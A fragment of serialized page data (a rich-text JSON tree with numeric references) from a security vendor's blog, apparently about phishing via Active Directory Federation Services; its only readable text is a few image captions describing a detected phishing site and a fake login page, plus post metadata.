2,"nodeType":186},{"uri":42062},[90553],{"data":90554,"marks":90555,"value":88402,"nodeType":173},{},[90556],{"type":194},{"data":90558,"marks":90559,"value":88406,"nodeType":173},{},[],{"data":90561,"content":90562,"nodeType":178},{},[90563,90566,90573,90576,90583,90586,90593],{"data":90564,"marks":90565,"value":88413,"nodeType":173},{},[],{"data":90567,"content":90568,"nodeType":186},{"uri":8043},[90569],{"data":90570,"marks":90571,"value":8046,"nodeType":173},{},[90572],{"type":194},{"data":90574,"marks":90575,"value":88424,"nodeType":173},{},[],{"data":90577,"content":90578,"nodeType":186},{"uri":88427},[90579],{"data":90580,"marks":90581,"value":88433,"nodeType":173},{},[90582],{"type":194},{"data":90584,"marks":90585,"value":88437,"nodeType":173},{},[],{"data":90587,"content":90588,"nodeType":186},{"uri":58195},[90589],{"data":90590,"marks":90591,"value":88445,"nodeType":173},{},[90592],{"type":194},{"data":90594,"marks":90595,"value":88449,"nodeType":173},{},[],{"data":90597,"content":90598,"nodeType":178},{},[90599,90602,90609,90612,90619],{"data":90600,"marks":90601,"value":88456,"nodeType":173},{},[],{"data":90603,"content":90604,"nodeType":186},{"uri":88459},[90605],{"data":90606,"marks":90607,"value":88465,"nodeType":173},{},[90608],{"type":194},{"data":90610,"marks":90611,"value":88469,"nodeType":173},{},[],{"data":90613,"content":90614,"nodeType":186},{"uri":8088},[90615],{"data":90616,"marks":90617,"value":8091,"nodeType":173},{},[90618],{"type":194},{"data":90620,"marks":90621,"value":197,"nodeType":173},{},[],{"data":90623,"content":90624,"nodeType":178},{},[90625,90628,90635],{"data":90626,"marks":90627,"value":88486,"nodeType":173},{},[],{"data":90629,"content":90630,"nodeType":186},{"uri":88489},[90631],{"data":90632,"marks":90633,"value":88495,"nodeType":173},{},[90634],{"type":194},{"data":90636,"marks":90637,"value":88499,"nodeType":173},{},[],{"data":90639,"content":90642,"nodeType":312},{"target":90640},{"sys":90641},{"id":60266,"type":317,"linkType":318},[],{"data":90644,"content":90645,"nodeType":231},{},[],{"data":90647,"content":90648,"nodeType":169},{},[90649],{"data":90650,"marks":90651,"value":88515,"nodeType":173},{},[90652],{"type":370},{"data":90654,"content":90655,"nodeType":178},{},[90656],{"data":90657,"marks":90658,"value":88522,"nodeType":173},{},[],{"data":90660,"content":90661,"nodeType":178},{},[90662],{"data":90663,"marks":90664,"value":88529,"nodeType":173},{},[],{"data":90666,"content":90667,"nodeType":178},{},[90668],{"data":90669,"marks":90670,"value":88536,"nodeType":173},{},[],{"data":90672,"content":90673,"nodeType":178},{},[90674],{"data":90675,"marks":90676,"value":88543,"nodeType":173},{},[],{"data":90678,"content":90679,"nodeType":250},{},[90680,90693,90706,90719,90732,90745,90758,90771],{"data":90681,"content":90682,"nodeType":254},{},[90683],{"data":90684,"content":90685,"nodeType":178},{},[90686,90690],{"data":90687,"marks":90688,"value":88557,"nodeType":173},{},[90689],{"type":370},{"data":90691,"marks":90692,"value":88561,"nodeType":173},{},[],{"data":90694,"content":90695,"nodeType":254},{},[90696],{"data":90697,"content":90698,"nodeType":178},{},[90699,90703],{"data":90700,"marks":90701,"value":88572,"nodeType":173},{},[90702],{"type":370},{"data":90704,"marks":90705,"value":88576,"nodeType":173},{},[],{"data":90707,"content":90708,"nodeType":254},{},[90709],{"data":90710,"content":90711,"nodeType":178},{},[90712,90716],{"data":90713,"marks":90714,"value":88587,"nodeType":173},{},[90715],{"type":370},{"data":90717,"marks":90718,"value":88591,"nodeType":173},{},[],{"data":90720,"content":90721,"nodeType":254},{},[90722],{"data":90723,"content":90724,"nodeType":178},{},[90725,90729],{"data":90726,"marks":90727,"value":88602,"nodeType":173},{},[90728],{"type":370},{"data":90730,"marks":90731,"value":88606,"nodeType":173},{},[],{"data":90733,"content":90734,"nodeType":254},{},[90735],{"data":90736,"content":90737,"nodeType":178},{},[90738,90742],{"data":90739,"marks":90740,"value":88617,"nodeType":173},{},[90741],{"type":370},{"data":90743,"marks":90744,"value":88621,"nodeType":173},{},[],{"data":90746,"content":90747,"nodeType":254},{},[90748],{"data":90749,"content":90750,"nodeType":178},{},[90751,90755],{"data":90752,"marks":90753,"value":88632,"nodeType":173},{},[90754],{"type":370},{"data":90756,"marks":90757,"value":88636,"nodeType":173},{},[],{"data":90759,"content":90760,"nodeType":254},{},[90761],{"data":90762,"content":90763,"nodeType":178},{},[90764,90768],{"data":90765,"marks":90766,"value":88647,"nodeType":173},{},[90767],{"type":370},{"data":90769,"marks":90770,"value":88651,"nodeType":173},{},[],{"data":90772,"content":90773,"nodeType":254},{},[90774],{"data":90775,"content":90776,"nodeType":178},{},[90777,90781],{"data":90778,"marks":90779,"value":88662,"nodeType":173},{},[90780],{"type":370},{"data":90782,"marks":90783,"value":88666,"nodeType":173},{},[],{"data":90785,"content":90786,"nodeType":178},{},[90787],{"data":90788,"marks":90789,"value":88673,"nodeType":173},{},[],{"data":90791,"content":90792,"nodeType":231},{},[],{"data":90794,"content":90795,"nodeType":169},{},[90796],{"data":90797,"marks":90798,"value":18605,"nodeType":173},{},[90799],{"type":370},{"data":90801,"content":90802,"nodeType":178},{},[90803,90806,90813],{"data":90804,"marks":90805,"value":37,"nodeType":173},{},[],{"data":90807,"content":90808,"nodeType":186},{"uri":24215},[90809],{"data":90810,"marks":90811,"value":88697,"nodeType":173},{},[90812],{"type":194},{"data":90814,"marks":90815,"value":37,"nodeType":173},{},[],{"data":90817,"content":90818,"nodeType":178},{},[90819,90822,90828],{"data":90820,"marks":90821,"value":88707,"nodeType":173},{},[],{"data":90823,"content":90824,"nodeType":186},{"uri":70840},[90825],{"data":90826,"marks":90827,"value":88714,"nodeType":173},{},[],{"data":90829,"marks":90830,"value":37,"nodeType":173},{},[],{"data":90832,"content":90833,"nodeType":231},{},[],{"data":90835,"content":90836,"nodeType":169},{},[90837],{"data":90838,"marks":90839,"value":88728,"nodeType":173},{},[90840],{"type":370},{"data":90842,"content":90843,"nodeType":178},{},[90844,90847,90853],{"data":90845,"marks":90846,"value":88735,"nodeType":173},{},[],{"data":90848,"content":90849,"nodeType":186},{"uri":88239},[90850],{"data":90851,"marks":90852,"value":88742,"nodeType":173},{},[],{"data":90854,"marks":90855,"value":88746,"nodeType":173},{},[],{"data":90857,"content":90858,"nodeType":178},{},[90859],{"data":90860,"marks":90861,"value":88753,"nodeType":173},{},[],{"data":90863,"content":90864,"nodeType":178},{},[90865,90868,90874],{"data":90866,"marks":90867,"value":88760,"nodeType":173},{},[],{"data":90869,"content":90870,"nodeType":186},{"uri":88763},[90871],{"data":90872,"marks":90873,"value":88768,"nodeType":173},{},[],{"data":90875,"marks":90876,"value":37,"nodeType":173},{},[],{"items":90878},[90879,90881],{"sys":90880,"name":509},{"id":508},{"sys":90882,"name":505},{"id":504},{"items":90884},[90885],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":90886},{"url":13981},{"items":90888},[90889],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":90890},{"url":8615},{"json":90892,"links":91401},{"data":90893,"content":90894,"nodeType":165},{},[90895,90901,90907,90923,90929,90945,90951,90954,90961,90967,90973,90978,90984,91024,91060,91067,91073,91089,91119,91124,91130,91135,91141,91148,91174,91179,91182,91189,91205,91221,91247,91252,91255,91262,91268,91348,91351,91358,91373,91379,91385],{"data":90896,"content":90897,"nodeType":178},{},[90898],{"data":90899,"marks":90900,"value":69788,"nodeType":173},{},[],{"data":90902,"content":90903,"nodeType":178},{},[90904],{"data":90905,"marks":90906,"value":69795,"nodeType":173},{},[],{"data":90908,"content":90909,"nodeType":178},{},[90910,90913,90920],{"data":90911,"marks":90912,"value":69802,"nodeType":173},{},[],{"data":90914,"content":90915,"nodeType":186},{"uri":69805},[90916],{"data":90917,"marks":90918,"value":69811,"nodeType":173},{},[90919],{"type":194},{"data":90921,"marks":90922,"value":69815,"nodeType":173},{},[],{"data":90924,"content":90925,"nodeType":178},{},[90926],{"data":90927,"marks":90928,"value":69822,"nodeType":173},{},[],{"data":90930,"content":90931,"nodeType":178},{},[90932,90935,90942],{"data":90933,"marks":90934,"value":69829,"nodeType":173},{},[],{"data":90936,"content":90937,"nodeType":186},{"uri":59420},[90938],{"data":90939,"marks":90940,"value":69837,"nodeType":173},{},[90941],{"type":194},{"data":90943,"marks":90944,"value":69841,"nodeType":173},{},[],{"data":90946,"content":90947,"nodeType":178},{},[90948],{"data":90949,"marks":90950,"value":69848,"nodeType":173},{},[],{"data":90952,"content":90953,"nodeType":231},{},[],{"data":90955,"content":90956,"nodeType":169},{},[90957],{"data":90958,"marks":90959,"value":69859,"nodeType":173},{},[90960],{"type":370},{"data":90962,"content":90963,"nodeType":178},{},[90964],{"data":90965,"marks":90966,"value":69866,"nodeType":173},{},[],{"data":90968,"content":90969,"nodeType":178},{},[90970],{"data":90971,"marks":90972,"value":69873,"nodeType":173},{},[],{"data":90974,"content":90977,"nodeType":312},{"target":90975},{"sys":90976},{"id":69878,"type":317,"linkType":318},[],{"data":90979,"content":90980,"nodeType":178},{},[90981],{"data":90982,"marks":90983,"value":69886,"nodeType":173},{},[],{"data":90985,"content":90986,"nodeType":250},{},[90987,90996,91015],{"data":90988,"content":90989,"nodeType":254},{},[90990],{"data":90991,"content":90992,"nodeType":178},{},[90993],{"data":90994,"marks":90995,"value":69899,"nodeType":173},{},[],{"data":90997,"content":90998,"nodeType":254},{},[90999],{"data":91000,"content":91001,"nodeType":178},{},[91002,91005,91012],{"data":91003,"marks":91004,"value":69909,"nodeType":173},{},[],{"data":91006,"content":91007,"nodeType":186},{"uri":69912},[91008],{"data":91009,"marks":91010,"value":8046,"nodeType":173},{},[91011],{"type":194},{"data":91013,"marks":91014,"value":69921,"nodeType":173},{},[],{"data":91016,"content":91017,"nodeType":254},{},[91018],{"data":91019,"content":91020,"nodeType":178},{},[91021],{"data":91022,"marks":91023,"value":69931,"nodeType":173},{},[],{"data":91025,"content":91026,"nodeType":178},{},[91027,91030,91037,91040,91047,91050,91057],{"data":91028,"marks":91029,"value":69938,"nodeType":173},{},[],{"data":91031,"content":91032,"nodeType":186},{"uri":69941},[91033],{"data":91034,"marks":91035,"value":69947,"nodeType":173},{},[91036],{"type":194},{"data":91038,"marks":91039,"value":69951,"nodeType":173},{},[],{"data":91041,"content":91042,"nodeType":186},{"uri":69941},[91043],{"data":91044,"marks":91045,"value":69947,"nodeType":173},{},[91046],{"type":194},{"data":91048,"marks":91049,"value":69962,"nodeType":173},{},[],{"data":91051,"content":91052,"nodeType":186},{"uri":69941},[91053],{"data":91054,"marks":91055,"value":69947,"nodeType":173},{},[91056],{"type":194},{"data":91058,"marks":91059,"value":69973,"nodeType":173},{},[],{"data":91061,"content":91062,"nodeType":235},{},[91063],{"data":91064,"marks":91065,"value":69981,"nodeType":173},{},[91066],{"type":370},{"data":91068,"content":91069,"nodeType":178},{},[91070],{"data":91071,"marks":91072,"value":69988,"nodeType":173},{},[],{"data":91074,"content":91075,"nodeType":178},{},[91076,91079,91086],{"data":91077,"marks":91078,"value":69995,"nodeType":173},{},[],{"data":91080,"content":91081,"nodeType":186},{"uri":69998},[91082],{"data":91083,"marks":91084,"value":70004,"nodeType":173},{},[91085],{"type":194},{"data":91087,"marks":91088,"value":70008,"nodeType":173},{},[],{"data":91090,"content":91091,"nodeType":178},{},[91092,91095,91102,91105,91112,91115],{"data":91093,"marks":91094,"value":70015,"nodeType":173},{},[],{"data":91096,"content":91097,"nodeType":186},{"uri":63250},[91098],{"data":91099,"marks":91100,"value":63256,"nodeType":173},{},[91101],{"type":194},{"data":91103,"marks":91104,"value":70026,"nodeType":173},{},[],{"data":91106,"content":91107,"nodeType":186},{"uri":70029},[91108],{"data":91109,"marks":91110,"value":70035,"nodeType":173},{},[91111],{"type":194},{"data":91113,"marks":91114,"value":70039,"nodeType":173},{},[],{"data":91116,"marks":91117,"value":70044,"nodeType":173},{},[91118],{"type":370},{"data":91120,"content":91123,"nodeType":312},{"target":91121},{"sys":91122},{"id":70049,"type":317,"linkType":318},[],{"data":91125,"content":91126,"nodeType":178},{},[91127],{"data":91128,"marks":91129,"value":70057,"nodeType":173},{},[],{"data":91131,"content":91134,"nodeType":312},{"target":91132},{"sys":91133},{"id":70062,"type":317,"linkType":318},[],{"data":91136,"content":91137,"nodeType":178},{},[91138],{"data":91139,"marks":91140,"value":70070,"nodeType":173},{},[],{"data":91142,"content":91143,"nodeType":235},{},[91144],{"data":91145,"marks":91146,"value":70078,"nodeType":173},{},[91147],{"type":370},{"data":91149,"content":91150,"nodeType":178},{},[91151,91154,91161,91164,91171],{"data":91152,"marks":91153,"value":70085,"nodeType":173},{},[],{"data":91155,"content":91156,"nodeType":186},{"uri":70088},[91157],{"data":91158,"marks":91159,"value":7856,"nodeType":173},{},[91160],{"type":194},{"data":91162,"marks":91163,"value":70097,"nodeType":173},{},[],{"data":91165,"content":91166,"nodeType":186},{"uri":69941},[91167],{"data":91168,"marks":91169,"value":69947,"nodeType":173},{},[91170],{"type":194},{"data":91172,"marks":91173,"value":70108,"nodeType":173},{},[],{"data":91175,"content":91178,"nodeType":312},{"target":91176},{"sys":91177},{"id":70113,"type":317,"linkType":318},[],{"data":91180,"content":91181,"nodeType":231},{},[],{"data":91183,"content":91184,"nodeType":169},{},[91185],{"data":91186,"marks":91187,"value":8221,"nodeType":173},{},[91188],{"type":370},{"data":91190,"content":91191,"nodeType":178},{},[91192,91195,91202],{"data":91193,"marks":91194,"value":70131,"nodeType":173},{},[],{"data":91196,"content":91197,"nodeType":186},{"uri":70134},[91198],{"data":91199,"marks":91200,"value":70140,"nodeType":173},{},[91201],{"type":194},{"data":91203,"marks":91204,"value":70144,"nodeType":173},{},[],{"data":91206,"content":91207,"nodeType":178},{},[91208,91211,91218],{"data":91209,"marks":91210,"value":70151,"nodeType":173},{},[],{"data":91212,"content":91213,"nodeType":186},{"uri":70154},[91214],{"data":91215,"marks":91216,"value":70160,"nodeType":173},{},[91217],{"type":194},{"data":91219,"marks":91220,"value":70164,"nodeType":173},{},[],{"data":91222,"content":91223,"nodeType":178},{},[91224,91227,91234,91237,91244],{"data":91225,"marks":91226,"value":70171,"nodeType":173},{},[],{"data":91228,"content":91229,"nodeType":186},{"uri":69912},[91230],{"data":91231,"marks":91232,"value":8046,"nodeType":173},{},[91233],{"type":194},{"data":91235,"marks":91236,"value":70182,"nodeType":173},{},[],{"data":91238,"content":91239,"nodeType":186},{"uri":14287},[91240],{"data":91241,"marks":91242,"value":70190,"nodeType":173},{},[91243],{"type":194},{"data":91245,"marks":91246,"value":70194,"nodeType":173},{},[],{"data":91248,"content":91251,"nodeType":312},{"target":91249},{"sys":91250},{"id":8590,"type":317,"linkType":318},[],{"data":91253,"content":91254,"nodeType":231},{},[],{"data":91256,"content":91257,"nodeType":169},{},[91258],{"data":91259,"marks":91260,"value":70210,"nodeType":173},{},[91261],{"type":370},{"data":91263,"content":91264,"nodeType":178},{},[91265],{"data":91266,"marks":91267,"value":70217,"nodeType":173},{},[],{"data":91269,"content":91270,"nodeType":250},{},[91271,91280,91299],{"data":91272,"content":91273,"nodeType":254},{},[91274],{"data":91275,"content":91276,"nodeType":178},{},[91277],{"data":91278,"marks":91279,"value":70230,"nodeType":173},{},[],{"data":91281,"content":91282,"nodeType":254},{},[91283],{"data":91284,"content":91285,"nodeType":178},{},[91286,91289,91296],{"data":91287,"marks":91288,"value":70240,"nodeType":173},{},[],{"data":91290,"content":91291,"nodeType":186},{"uri":69941},[91292],{"data":91293,"marks":91294,"value":69947,"nodeType":173},{},[91295],{"type":194},{"data":91297,"marks":91298,"value":70251,"nodeType":173},{},[],{"data":91300,"content":91301,"nodeType":254},{},[91302],{"data":91303,"content":91304,"nodeType":178},{},[91305,91308,91315,91318,91325,91328,91335,91338,91345],{"data":91306,"marks":91307,"value":70261,"nodeType":173},{},[],{"data":91309,"content":91310,"nodeType":186},{"uri":70264},[91311],{"data":91312,"marks":91313,"value":70270,"nodeType":173},{},[91314],{"type":194},{"data":91316,"marks":91317,"value":2936,"nodeType":173},{},[],{"data":91319,"content":91320,"nodeType":186},{"uri":70276},[91321],{"data":91322,"marks":91323,"value":70282,"nodeType":173},{},[91324],{"type":194},{"data":91326,"marks":91327,"value":2936,"nodeType":173},{},[],{"data":91329,"content":91330,"nodeType":186},{"uri":70288},[91331],{"data":91332,"marks":91333,"value":70294,"nodeType":173},{},[91334],{"type":194},{"data":91336,"marks":91337,"value":3949,"nodeType":173},{},[],{"data":91339,"content":91340,"nodeType":186},{"uri":70300},[91341],{"data":91342,"marks":91343,"value":70306,"nodeType":173},{},[91344],{"type":194},{"data":91346,"marks":91347,"value":70310,"nodeType":173},{},[],{"data":91349,"content":91350,"nodeType":231},{},[],{"data":91352,"content":91353,"nodeType":169},{},[91354],{"data":91355,"marks":91356,"value":2824,"nodeType":173},{},[91357],{"type":370},{"data":91359,"content":91360,"nodeType":178},{},[91361,91364,91370],{"data":91362,"marks":91363,"value":70327,"nodeType":173},{},[],{"data":91365,"content":91366,"nodeType":186},{"uri":6820},[91367],{"data":91368,"marks":91369,"value":8545,"nodeType":173},{},[],{"data":91371,"marks":91372,"value":59454,"nodeType":173},{},[],{"data":91374,"content":91375,"nodeType":178},{},[91376],{"data":91377,"marks":91378,"value":70343,"nodeType":173},{},[],{"data":91380,"content":91381,"nodeType":178},{},[91382],{"data":91383,"marks":91384,"value":70350,"nodeType":173},{},[],{"data":91386,"content":91387,"nodeType":178},{},[91388,91391,91398],{"data":91389,"marks":91390,"value":61741,"nodeType":173},{},[],{"data":91392,"content":91393,"nodeType":186},{"uri":473},[91394],{"data":91395,"marks":91396,"value":70364,"nodeType":173},{},[91397],{"type":194},{"data":91399,"marks":91400,"value":37,"nodeType":173},{},[],{"entries":91402},{"hyperlink":91403,"inline":91404,"block":91405},[],[],[91406,91413,91419,91425,91431],{"sys":91407,"__typename":5345,"title":91408,"caption":91408,"layoutMode":118,"file":91409},{"id":69878},"Timeline from the detection event — in this case, the control was configured in “monitor” mode, so it was not automatically blocked. ",{"url":91410,"width":91411,"height":91412},"https://images.ctfassets.net/y1cdw1ablpvd/40mzFhR7ZwbsVhuVQBPtmo/ffb413710cdcde1879b1246b140528da/image4.png",1818,1536,{"sys":91414,"__typename":5345,"title":91415,"caption":91415,"layoutMode":118,"file":91416},{"id":70049},"The authorization request being passed to the ADFS server for bluegraintours.",{"url":91417,"width":5358,"height":91418},"https://images.ctfassets.net/y1cdw1ablpvd/29R1ECNuEmmzH61DIdZPNL/011f52d836662fb9e384880718ee6588/image2.png",818,{"sys":91420,"__typename":5345,"title":91421,"caption":91421,"layoutMode":118,"file":91422},{"id":70062},"Screen capture of the bluegraintours site, includes a fake blog with entries from \"John Doe\" and \"Jane Smith\" as well as fake addresses which were definite giveaways that this is a fake, likely AI-generated site.",{"url":91423,"width":5358,"height":91424},"https://images.ctfassets.net/y1cdw1ablpvd/1W3XqoHwF8BrQ71EbiG0MH/a07ca08d9c4395007104109466b9a336/image1.png",861,{"sys":91426,"__typename":5345,"title":91427,"caption":91427,"layoutMode":118,"file":91428},{"id":70113},"The very standard-looking malicious Microsoft login page. ",{"url":91429,"width":5358,"height":91430},"https://images.ctfassets.net/y1cdw1ablpvd/4kchCJSXKscISpZir2PJA9/4eb30043165a6a6ad27a7c74326832a5/image3.png",1320,{"sys":91432,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},"content:blog:phishing-with-active-directory-federation-services.json","blog/phishing-with-active-directory-federation-services.json","blog/phishing-with-active-directory-federation-services",{"_path":91437,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":91438,"ogImage":118,"summary":91440,"title":46282,"subtitle":118,"metaTitle":91451,"synopsis":88772,"hashTags":118,"publishedDate":88773,"slug":46283,"tagsCollection":91452,"relatedBlogPostsCollection":91458,"authorsCollection":93534,"content":93538,"_id":94023,"_type":5439,"_source":5440,"_file":94024,"_stem":94025,"_extension":5439},"/blog/phishing-detection-evasion-launch",{"id":24126,"publishedAt":91439},"2025-08-06T14:26:34.307Z",{"json":91441},{"data":91442,"content":91443,"nodeType":165},{},[91444],{"data":91445,"content":91446,"nodeType":178},{},[91447],{"data":91448,"marks":91449,"value":91450,"nodeType":173},{},[],"We’ve published our latest resource for security teams breaking down the techniques that modern phishing attacks are using to evade detection. ","How modern phishing attacks evade detection controls",{"items":91453},[91454,91456],{"sys":91455,"name":509},{"id":508},{"sys":91457,"name":505},{"id":504},{"items":91459},[91460,92320,92905],{"__typename":1528,"sys":91461,"content":91462,"title":46296,"synopsis":82273,"hashTags":118,"publishedDate":82274,"slug":46297,"tagsCollection":92310,"authorsCollection":92316},{"id":24428},{"json":91463},{"nodeType":165,"data":91464,"content":91465},{},[91466,91472,91482,91492,91502,91512,91517,91533,91539,91552,91558,91563,91566,91573,91579,91585,91591,91596,91599,91606,91612,91628,91634,91640,91646,91652,91657,91663,91669,91675,91700,91706,91722,91728,91734,91750,91766,91782,91787,91793,91806,91812,91818,91824,91840,91847,91853,91859,91862,91869,91875,91881,91887,91926,91931,91937,91950,92027,92032,92038,92044,92101,92107,92113,92119,92124,92130,92136,92142,92147,92153,92159,92165,92170,92186,92192,92198,92237,92242,92245,92252,92272,92275,92282,92288,92294],{"nodeType":178,"data":91467,"content":91468},{},[91469],{"nodeType":173,"value":81303,"marks":91470,"data":91471},[],{},{"nodeType":178,"data":91473,"content":91474},{},[91475,91479],{"nodeType":173,"value":81310,"marks":91476,"data":91478},[91477],{"type":370},{},{"nodeType":173,"value":81315,"marks":91480,"data":91481},[],{},{"nodeType":178,"data":91483,"content":91484},{},[91485,91489],{"nodeType":173,"value":81322,"marks":91486,"data":91488},[91487],{"type":370},{},{"nodeType":173,"value":81327,"marks":91490,"data":91491},[],{},{"nodeType":178,"data":91493,"content":91494},{},[91495,91499],{"nodeType":173,"value":81334,"marks":91496,"data":91498},[91497],{"type":370},{},{"nodeType":173,"value":81339,"marks":91500,"data":91501},[],{},{"nodeType":178,"data":91503,"content":91504},{},[91505,91509],{"nodeType":173,"value":81346,"marks":91506,"data":91508},[91507],{"type":370},{},{"nodeType":173,"value":81351,"marks":91510,"data":91511},[],{},{"nodeType":312,"data":91513,"content":91516},{"target":91514},{"sys":91515},{"id":81358,"type":317,"linkType":318},[],{"nodeType":178,"data":91518,"content":91519},{},[91520,91523,91530],{"nodeType":173,"value":81364,"marks":91521,"data":91522},[],{},{"nodeType":186,"data":91524,"content":91525},{"uri":63182},[91526],{"nodeType":173,"value":81371,"marks":91527,"data":91529},[91528],{"type":194},{},{"nodeType":173,"value":81376,"marks":91531,"data":91532},[],{},{"nodeType":178,"data":91534,"content":91535},{},[91536],{"nodeType":173,"value":81383,"marks":91537,"data":91538},[],{},{"nodeType":178,"data":91540,"content":91541},{},[91542,91545,91549],{"nodeType":173,"value":81390,"marks":91543,"data":91544},[],{},{"nodeType":173,"value":19231,"marks":91546,"data":91548},[91547],{"type":370},{},{"nodeType":173,"value":81398,"marks":91550,"data":91551},[],{},{"nodeType":178,"data":91553,"content":91554},{},[91555],{"nodeType":173,"value":81405,"marks":91556,"data":91557},[],{},{"nodeType":312,"data":91559,"content":91562},{"target":91560},{"sys":91561},{"id":81412,"type":317,"linkType":318},[],{"nodeType":231,"data":91564,"content":91565},{},[],{"nodeType":169,"data":91567,"content":91568},{},[91569],{"nodeType":173,"value":81421,"marks":91570,"data":91572},[91571],{"type":370},{},{"nodeType":178,"data":91574,"content":91575},{},[91576],{"nodeType":173,"value":81429,"marks":91577,"data":91578},[],{},{"nodeType":178,"data":91580,"content":91581},{},[91582],{"nodeType":173,"value":81436,"marks":91583,"data":91584},[],{},{"nodeType":178,"data":91586,"content":91587},{},[91588],{"nodeType":173,"value":81443,"marks":91589,"data":91590},[],{},{"nodeType":312,"data":91592,"content":91595},{"target":91593},{"sys":91594},{"id":81450,"type":317,"linkType":318},[],{"nodeType":231,"data":91597,"content":91598},{},[],{"nodeType":169,"data":91600,"content":91601},{},[91602],{"nodeType":173,"value":81459,"marks":91603,"data":91605},[91604],{"type":370},{},{"nodeType":178,"data":91607,"content":91608},{},[91609],{"nodeType":173,"value":81467,"marks":91610,"data":91611},[],{},{"nodeType":178,"data":91613,"content":91614},{},[91615,91618,91625],{"nodeType":173,"value":81474,"marks":91616,"data":91617},[],{},{"nodeType":186,"data":91619,"content":91620},{"uri":77262},[91621],{"nodeType":173,"value":81481,"marks":91622,"data":91624},[91623],{"type":194},{},{"nodeType":173,"value":81486,"marks":91626,"data":91627},[],{},{"nodeType":178,"data":91629,"content":91630},{},[91631],{"nodeType":173,"value":81493,"marks":91632,"data":91633},[],{},{"nodeType":178,"data":91635,"content":91636},{},[91637],{"nodeType":173,"value":81500,"marks":91638,"data":91639},[],{},{"nodeType":235,"data":91641,"content":91642},{},[91643],{"nodeType":173,"value":81507,"marks":91644,"data":91645},[],{},{"nodeType":178,"data":91647,"content":91648},{},[91649],{"nodeType":173,"value":81514,"marks":91650,"data":91651},[],{},{"nodeType":312,"data":91653,"content":91656},{"target":91654},{"sys":91655},{"id":81521,"type":317,"linkType":318},[],{"nodeType":178,"data":91658,"content":91659},{},[91660],{"nodeType":173,"value":81527,"marks":91661,"data":91662},[],{},{"nodeType":235,"data":91664,"content":91665},{},[91666],{"nodeType":173,"value":81534,"marks":91667,"data":91668},[],{},{"nodeType":178,"data":91670,"content":91671},{},[91672],{"nodeType":173,"value":81541,"marks":91673,"data":91674},[],{},{"nodeType":178,"data":91676,"content":91677},{},[91678,91681,91689,91693,91696],{"nodeType":173,"value":81548,"marks":91679,"data":91680},[],{},{"nodeType":186,"data":91682,"content":91683},{"uri":81553},[91684],{"nodeType":173,"value":81556,"marks":91685,"data":91688},[91686,91687],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":91690,"data":91692},[91691],{"type":370},{},{"nodeType":173,"value":81566,"marks":91694,"data":91695},[],{},{"nodeType":173,"value":73803,"marks":91697,"data":91699},[91698],{"type":370},{},{"nodeType":178,"data":91701,"content":91702},{},[91703],{"nodeType":173,"value":81577,"marks":91704,"data":91705},[],{},{"nodeType":178,"data":91707,"content":91708},{},[91709,91712,91719],{"nodeType":173,"value":81584,"marks":91710,"data":91711},[],{},{"nodeType":186,"data":91713,"content":91714},{"uri":63182},[91715],{"nodeType":173,"value":25071,"marks":91716,"data":91718},[91717],{"type":194},{},{"nodeType":173,"value":81595,"marks":91720,"data":91721},[],{},{"nodeType":235,"data":91723,"content":91724},{},[91725],{"nodeType":173,"value":81602,"marks":91726,"data":91727},[],{},{"nodeType":178,"data":91729,"content":91730},{},[91731],{"nodeType":173,"value":81609,"marks":91732,"data":91733},[],{},{"nodeType":178,"data":91735,"content":91736},{},[91737,91740,91747],{"nodeType":173,"value":81616,"marks":91738,"data":91739},[],{},{"nodeType":186,"data":91741,"content":91742},{"uri":81621},[91743],{"nodeType":173,"value":81624,"marks":91744,"data":91746},[91745],{"type":194},{},{"nodeType":173,"value":81629,"marks":91748,"data":91749},[],{},{"nodeType":178,"data":91751,"content":91752},{},[91753,91756,91763],{"nodeType":173,"value":81636,"marks":91754,"data":91755},[],{},{"nodeType":186,"data":91757,"content":91758},{"uri":81641},[91759],{"nodeType":173,"value":81644,"marks":91760,"data":91762},[91761],{"type":194},{},{"nodeType":173,"value":81649,"marks":91764,"data":91765},[],{},{"nodeType":178,"data":91767,"content":91768},{},[91769,91772,91779],{"nodeType":173,"value":81656,"marks":91770,"data":91771},[],{},{"nodeType":186,"data":91773,"content":91774},{"uri":75099},[91775],{"nodeType":173,"value":81663,"marks":91776,"data":91778},[91777],{"type":194},{},{"nodeType":173,"value":81668,"marks":91780,"data":91781},[],{},{"nodeType":312,"data":91783,"content":91786},{"target":91784},{"sys":91785},{"id":81675,"type":317,"linkType":318},[],{"nodeType":235,"data":91788,"content":91789},{},[91790],{"nodeType":173,"value":81681,"marks":91791,"data":91792},[],{},{"nodeType":178,"data":91794,"content":91795},{},[91796,91799,91803],{"nodeType":173,"value":81688,"marks":91797,"data":91798},[],{},{"nodeType":173,"value":81692,"marks":91800,"data":91802},[91801],{"type":1646},{},{"nodeType":173,"value":81697,"marks":91804,"data":91805},[],{},{"nodeType":178,"data":91807,"content":91808},{},[91809],{"nodeType":173,"value":81704,"marks":91810,"data":91811},[],{},{"nodeType":178,"data":91813,"content":91814},{},[91815],{"nodeType":173,"value":81711,"marks":91816,"data":91817},[],{},{"nodeType":178,"data":91819,"content":91820},{},[91821],{"nodeType":173,"value":81718,"marks":91822,"data":91823},[],{},{"nodeType":178,"data":91825,"content":91826},{},[91827,91830,91837],{"nodeType":173,"value":81725,"marks":91828,"data":91829},[],{},{"nodeType":186,"data":91831,"content":91832},{"uri":832},[91833],{"nodeType":173,"value":81732,"marks":91834,"data":91836},[91835],{"type":194},{},{"nodeType":173,"value":81737,"marks":91838,"data":91839},[],{},{"nodeType":178,"data":91841,"content":91842},{},[91843],{"nodeType":173,"value":81744,"marks":91844,"data":91846},[91845],{"type":370},{},{"nodeType":178,"data":91848,"content":91849},{},[91850],{"nodeType":173,"value":81752,"marks":91851,"data":91852},[],{},{"nodeType":178,"data":91854,"content":91855},{},[91856],{"nodeType":173,"value":81759,"marks":91857,"data":91858},[],{},{"nodeType":231,"data":91860,"content":91861},{},[],{"nodeType":169,"data":91863,"content":91864},{},[91865],{"nodeType":173,"value":81769,"marks":91866,"data":91868},[91867],{"type":370},{},{"nodeType":178,"data":91870,"content":91871},{},[91872],{"nodeType":173,"value":81777,"marks":91873,"data":91874},[],{},{"nodeType":178,"data":91876,"content":91877},{},[91878],{"nodeType":173,"value":81784,"marks":91879,"data":91880},[],{},{"nodeType":178,"data":91882,"content":91883},{},[91884],{"nodeT